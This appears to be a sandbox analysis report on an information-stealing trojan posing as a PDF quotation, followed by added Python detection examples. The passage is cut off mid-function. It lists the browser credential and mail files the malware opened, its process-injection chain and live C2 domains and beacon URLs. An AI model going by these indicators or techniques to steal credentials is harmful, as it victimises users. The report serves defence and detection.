Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary

Stealing of Sensitive Information

Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\RMActivate_isv.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Quotation request -30112024_pdf.exe | Binary or memory string: WIN_XP
Source: Quotation request -30112024_pdf.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Quotation request -30112024_pdf.exe | Binary or memory string: WIN_XPe
Source: Quotation request -30112024_pdf.exe | Binary or memory string: WIN_VISTA
Source: Quotation request -30112024_pdf.exe | Binary or memory string: WIN_7
Source: Quotation request -30112024_pdf.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.1643178908.0000000006880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3137237939.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3134393651.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3130613752.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3134403470.0000000003B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1641218754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3134574203.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.1642068110.0000000004A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\Quotation request -30112024_pdf.exe | Code function: 2_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
MITRE ATT&CK Matrix

The number in front of a technique is the badge shown on the matrix cell for this sample; cells without a number are the empty matrix cells.

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
| Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 3 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 3 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
Behavior graph (ID 1557571, start date 18/11/2024, architecture: Windows, score 100), flattened from the rendered graph:

Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 5 other signatures.
Contacted hosts at sample level: www.tals.xyz; www.egyshare.xyz (Performs DNS queries to domains with low reputation); 13 other IPs or domains.

Process tree:
Quotation request -30112024_pdf.exe (started)
    signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
    -> svchost.exe (started)
        signatures: Maps a DLL or memory area into another process
        -> xvYhLzczmazJ.exe (injected)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            -> RMActivate_isv.exe (started)
                signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                -> xvYhLzczmazJ.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    network: www.ytsd88.top 47.76.213.197 (ports 53115, 80; VODAFONE-TRANSIT-ASVodafoneNZLtdNZ, United States); www.startvin.top 203.161.46.205 (ports 53173, 53174, 53175; VNPT-AS-VNVNPTCorpVN, Malaysia); 6 other IPs or domains
                -> firefox.exe (started)
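The chain in the graph (the sample starts and writes into svchost.exe, the injected code starts RMActivate_isv.exe, which in turn launches firefox.exe for the credential-harvesting step) is detectable from process-creation and process-access telemetry alone. The following is an added example, not part of the Joe Sandbox report: it runs three generic rules over Sysmon-style events. The EVENTS list is constructed to mirror the graph plus some benign noise; the PIDs, the sample path under the user's Desktop and the simplified field set are assumptions.

```python
"""Detect the injection chain drawn in the behavior graph above from
Sysmon-style process events.

Added example; not part of the Joe Sandbox report. EVENTS is constructed to
mirror the graph (sample -> svchost.exe -> RMActivate_isv.exe -> firefox.exe)
plus benign noise; PIDs and the sample path are made up. Sysmon event IDs:
1 = ProcessCreate, 8 = CreateRemoteThread, 10 = ProcessAccess.
"""
import ntpath

SAMPLE = r"C:\Users\user\Desktop\Quotation request -30112024_pdf.exe"  # assumed path

EVENTS = [
    {"id": 1, "pid": 1234, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe"},
    {"id": 1, "pid": 4100, "ppid": 1234, "image": SAMPLE,
     "parent_image": r"C:\Windows\explorer.exe"},
    # The sample starts svchost.exe and then writes into it (graph: "Writes to
    # foreign memory regions", "Maps a DLL or memory area into another process").
    {"id": 1, "pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": SAMPLE},
    {"id": 8, "source_pid": 4100, "source_image": SAMPLE,
     "target_pid": 4212, "target_image": r"C:\Windows\System32\svchost.exe"},
    # The injected svchost.exe starts RMActivate_isv.exe, which starts Firefox.
    {"id": 1, "pid": 4300, "ppid": 4212, "image": r"C:\Windows\System32\RMActivate_isv.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe"},
    {"id": 1, "pid": 4388, "ppid": 4300, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\System32\RMActivate_isv.exe"},
    # Benign noise: a user-launched browser and a normal service host touched by csrss.
    {"id": 1, "pid": 5000, "ppid": 1234, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"id": 1, "pid": 5100, "ppid": 700, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe"},
    {"id": 10, "source_pid": 600, "source_image": r"C:\Windows\System32\csrss.exe",
     "target_pid": 5100, "target_image": r"C:\Windows\System32\svchost.exe"},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe"}


def name(path):
    return ntpath.basename(path).lower()


def in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def detect(events):
    """Return (rule, source, target) findings for the FormBook-style chain."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    children = {}
    for p in procs.values():
        children.setdefault(p["ppid"], []).append(p["pid"])

    def descendants(pid):
        stack, seen = [pid], set()
        while stack:
            for c in children.get(stack.pop(), []):
                if c not in seen:
                    seen.add(c)
                    stack.append(c)
        return seen

    findings = []
    for e in events:
        # Rule 1: a binary outside the Windows system directories creates a
        # thread in / opens a system binary (the sample -> svchost.exe step).
        if e["id"] in (8, 10) and in_system_dir(e["target_image"]) \
                and not in_system_dir(e["source_image"]):
            findings.append(("inject_into_system_process",
                             name(e["source_image"]), name(e["target_image"])))
            # Rule 3: the injected process or any descendant launches a browser,
            # the credential-harvesting step in the graph.
            for d in descendants(e["target_pid"]):
                if name(procs[d]["image"]) in BROWSERS:
                    findings.append(("injected_chain_spawns_browser",
                                     name(e["source_image"]), name(procs[d]["image"])))
    # Rule 2: a browser whose parent is a System32 binary that is not a shell
    # (RMActivate_isv.exe -> firefox.exe).
    for p in procs.values():
        if name(p["image"]) in BROWSERS and in_system_dir(p["parent_image"]) \
                and name(p["parent_image"]) not in SHELLS:
            findings.append(("browser_spawned_by_system_binary",
                             name(p["parent_image"]), name(p["image"])))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f)
```

Rule 1 keys on the target being a system-directory binary rather than on svchost.exe by name, because the host process differs between stages even within this one run (svchost.exe, then RMActivate_isv.exe). In production, Sysmon event 10 is noisy; add a GrantedAccess filter (write or thread-creation rights) before alerting on it.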

Screenshots: all screenshots as thumbnails, including those not shown in the slideshow (images not included in this extract).
Antivirus detection, submitted file:
Source | Detection | Scanner | Label
Quotation request -30112024_pdf.exe | 63% | ReversingLabs | Win32.Trojan.AutoitInject
Quotation request -30112024_pdf.exe | 100% | Avira | HEUR/AGEN.1321703
Quotation request -30112024_pdf.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://www.egyshare.xyz/lu7u/ | 0% | Avira URL Cloud | safe
http://www.cssa.auction/g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh | 0% | Avira URL Cloud | safe
http://www.mdpc7.top | 0% | Avira URL Cloud | safe
http://www.tals.xyz/010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh | 0% | Avira URL Cloud | safe
http://www.tals.xyz/010v/ | 0% | Avira URL Cloud | safe
http://www.cssa.auction/g4fs/ | 0% | Avira URL Cloud | safe
http://www.ytsd88.top/yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh | 0% | Avira URL Cloud | safe
http://www.startvin.top/chrv/ | 0% | Avira URL Cloud | safe
http://www.egyshare.xyz/lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze | 0% | Avira URL Cloud | safe
https://kb.fastpanel.direct/troubleshoot/ | 0% | Avira URL Cloud | safe
http://www.mdpc7.top/55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh | 0% | Avira URL Cloud | safe
http://www.bionanosolutions.info/i6zb/ | 0% | Avira URL Cloud | safe
http://www.mdpc7.top/55tt/ | 0% | Avira URL Cloud | safe
http://www.bionanosolutions.info/i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh | 0% | Avira URL Cloud | safe
http://www.acc888ommodate.xyz/aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf | 0% | Avira URL Cloud | safe
http://www.070002018.xyz/zffa/ | 0% | Avira URL Cloud | safe
http://www.startvin.top/chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of | 0% | Avira URL Cloud | safe
http://www.acc888ommodate.xyz/aqil/ | 0% | Avira URL Cloud | safe
http://www.070002018.xyz/zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.bionanosolutions.info | 176.117.73.104 | true | true | - | unknown
www.070002018.xyz | 161.97.142.144 | true | true | - | unknown
www.startvin.top | 203.161.46.205 | true | true | - | unknown
www.tals.xyz | 13.248.169.48 | true | true | - | unknown
mmd.dnsmmd.com | 20.2.36.112 | true | true | - | unknown
www.ytsd88.top | 47.76.213.197 | true | true | - | unknown
www.acc888ommodate.xyz | 176.32.38.130 | true | true | - | unknown
cssa.auction | 107.167.84.42 | true | true | - | unknown
www.egyshare.xyz | 13.248.169.48 | true | true | - | unknown
phoenix88.sbs | 88.99.61.52 | true | false | - | unknown
www.mdpc7.top | unknown | unknown | false | - | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | false | - | unknown
www.cssa.auction | unknown | unknown | false | - | unknown
www.phoenix88.sbs | unknown | unknown | false | - | unknown
www.uynline.shop | unknown | unknown | false | - | unknown
URLs:
Name | Malicious | Antivirus Detection | Reputation
http://www.egyshare.xyz/lu7u/ | true | Avira URL Cloud: safe | unknown
http://www.ytsd88.top/yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh | true | Avira URL Cloud: safe | unknown
http://www.tals.xyz/010v/ | true | Avira URL Cloud: safe | unknown
http://www.cssa.auction/g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh | true | Avira URL Cloud: safe | unknown
http://www.tals.xyz/010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh | true | Avira URL Cloud: safe | unknown
http://www.egyshare.xyz/lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze | true | Avira URL Cloud: safe | unknown
http://www.cssa.auction/g4fs/ | true | Avira URL Cloud: safe | unknown
http://www.startvin.top/chrv/ | true | Avira URL Cloud: safe | unknown
http://www.bionanosolutions.info/i6zb/ | true | Avira URL Cloud: safe | unknown
http://www.startvin.top/chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of | true | Avira URL Cloud: safe | unknown
http://www.070002018.xyz/zffa/ | true | Avira URL Cloud: safe | unknown
http://www.mdpc7.top/55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh | true | Avira URL Cloud: safe | unknown
http://www.mdpc7.top/55tt/ | true | Avira URL Cloud: safe | unknown
http://www.acc888ommodate.xyz/aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf | true | Avira URL Cloud: safe | unknown
http://www.070002018.xyz/zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh | true | Avira URL Cloud: safe | unknown
http://www.bionanosolutions.info/i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh | true | Avira URL Cloud: safe | unknown
http://www.acc888ommodate.xyz/aqil/ | true | Avira URL Cloud: safe | unknown
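Every C2 URL above shares one layout: a four-character directory, a query parameter with a constant value (tD_=f00xUVKh) and a second parameter carrying a long varying blob (0PIXBf9=...), spread across nine unrelated domains, and Avira URL Cloud rates all of them "safe", so a reputation lookup alone would miss them. The block below is an added example, not part of the Joe Sandbox report: it learns that layout from the report's own URLs and scores new URLs against it. REPORT_URLS is copied from the tables above; the control URLs in BENIGN_URLS, the scoring levels and the path regex are constructed here.

```python
"""Turn the C2 URLs in this report into a reusable FormBook beacon signature.

Added example, not part of the Joe Sandbox report. REPORT_URLS is copied
from the report's URL tables; BENIGN_URLS, the signature learning and the
scoring are constructed for illustration.
"""
import re
from collections import Counter

REPORT_URLS = [
    "http://www.egyshare.xyz/lu7u/",
    "http://www.tals.xyz/010v/",
    "http://www.cssa.auction/g4fs/?0PIXBf9=3ndIaHiqeNA3nHGd8AHkXwlYF1OgixBFyjUlI87s5QAdbYlY5Sf7asAsxRx6tHqc14Nk2leX0TZcqtK/n28nLOTw2Vfuiiw8TGap3DrxCRua9Dp2yMpF4VwKHEspiCTWJ2CwkW3F1CDu&tD_=f00xUVKh",
    "http://www.tals.xyz/010v/?0PIXBf9=2DU2m0hj/03yT64ZAvV34ivg7uPA4dfBDsSIbuQmFBnlUt8YBQQ14XEnB00q3iyOSDF3P+nMuqVdWH+dOv2myK47+wAnbzEdrDFKM4GnqLu4eJ36TYO1rG1EAVouommahjHXUR9pmevZ&tD_=f00xUVKh",
    "http://www.ytsd88.top/yysf/?0PIXBf9=6v+kdCMiu5/5470MX9lzQyj8/+WeB1VHD3zgv43+rVSd7gkLKIFyovo7JjBoxgRqvXZx1v1SEu244MoSpwzCrGiBlqOxipli+BYTnOI67OOyvHeuq/FHXkVErKkJ9HuzEweZBdUTs+cq&tD_=f00xUVKh",
    "http://www.egyshare.xyz/lu7u/?tD_=f00xUVKh&0PIXBf9=yZTmjXW21Nq5wh91IMf/kDRGkUZ+XT2lkv3n4X6DMmMz0B5xbYyQHfDnacj01uuzec64BAri/1xnyBkH0yVWWE7yUWUVCQJ95ExXsfUTBKKOk42MManlE2uXf/wCPPD1XSw9siMiJ2ze",
    "http://www.mdpc7.top/55tt/?0PIXBf9=Ogm+Zpk+8l6HQ6PINDlmGUkcF8k7x5YOd8W05nhCgxhbbgxSQo8C646ORpAxt2ba51M1bpBVlaSpASxEjtHc742t+MiRm52SMn9uh/BsfFsC8+xAemM0t+vEaw1VEDnH1Ike7P0+r0HF&tD_=f00xUVKh",
    "http://www.bionanosolutions.info/i6zb/?0PIXBf9=6B2/7Ngl58s2pznOHRe+vJ9NgeSMQEkiwdm42/mNvrNW/DcFgEbztbyoGAni7ddU1GsG6dsX45s7M+CgnpRasEd6qu0hZk1EhvCSzFnjn53BAZCqqKYjVrue1TDSDBq9qg8+DFp/ZHMc&tD_=f00xUVKh",
    "http://www.acc888ommodate.xyz/aqil/?tD_=f00xUVKh&0PIXBf9=+VwoEzPaDs0s7aELp9mEitaybqlo9Ma6vB91+jO83mkKcBs1X1DQL/6P3P2ZQT9OHqbgLgcpvVmqnE/hn02MtVwUieIUVcwPPIBQaGnRdw6ZzI3y7/51wpZ1zsNtMrZa/5ef5+yRkwqf",
    "http://www.startvin.top/chrv/?tD_=f00xUVKh&0PIXBf9=oqIvPuLKU6ipUF0l0s9jGwC5Rs+ISH+IiXTOUljk/btMUGhxXUhy/ROn8iRvBZThJHrBfDF95d/bLV86djItjxOaoccx9TISaPCf4hbQm/G+Yq+LkHY0VTYNMEk+ymSz3ZEiRr7ur/of",
    "http://www.070002018.xyz/zffa/?0PIXBf9=Lr0UKEZNgDTJN6gT+Us371Y8hMyDvaQkpz1n9V5B19O6mDyNa8d38Q+pA9qLUvQ8A8Z/r2CCV5OH4hlRsxt9M39/KtueIxj6h2UJ95Aou8NDO7hK3C23zz+4LvY5JlduZs+ECZ1LIizb&tD_=f00xUVKh",
]

# Constructed control URLs: one with the same four-character directory shape
# but different parameters, one bare path, one ordinary search URL.
BENIGN_URLS = [
    "https://duckduckgo.com/ac/?q=formbook",
    "http://example.com/abcd/?id=1&lang=en",
    "http://example.com/lu7u/",
]

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")


def split_query(url):
    """Return (host, path, [(name, value), ...]). Deliberately not
    urllib.parse.parse_qsl: that would turn '+' into a space and corrupt the
    base64-like blob in the data parameter (see the acc888ommodate URL)."""
    host, path, query = re.match(r"^https?://([^/]+)(/[^?]*)\??(.*)$", url).groups()
    params = []
    for kv in filter(None, query.split("&")):
        name, _, value = kv.partition("=")
        params.append((name, value))
    return host, path, params


def learn_signature(urls):
    """What is constant across the sampled beacons: the parameter names, any
    parameter whose value never changes (the campaign token) and the shortest
    length seen for the varying (encrypted) parameter."""
    names, values, n = Counter(), {}, 0
    for url in urls:
        _, path, params = split_query(url)
        if not params or not PATH_RE.match(path):
            continue  # bare directory hits carry no parameters to learn from
        n += 1
        for name, value in params:
            names[name] += 1
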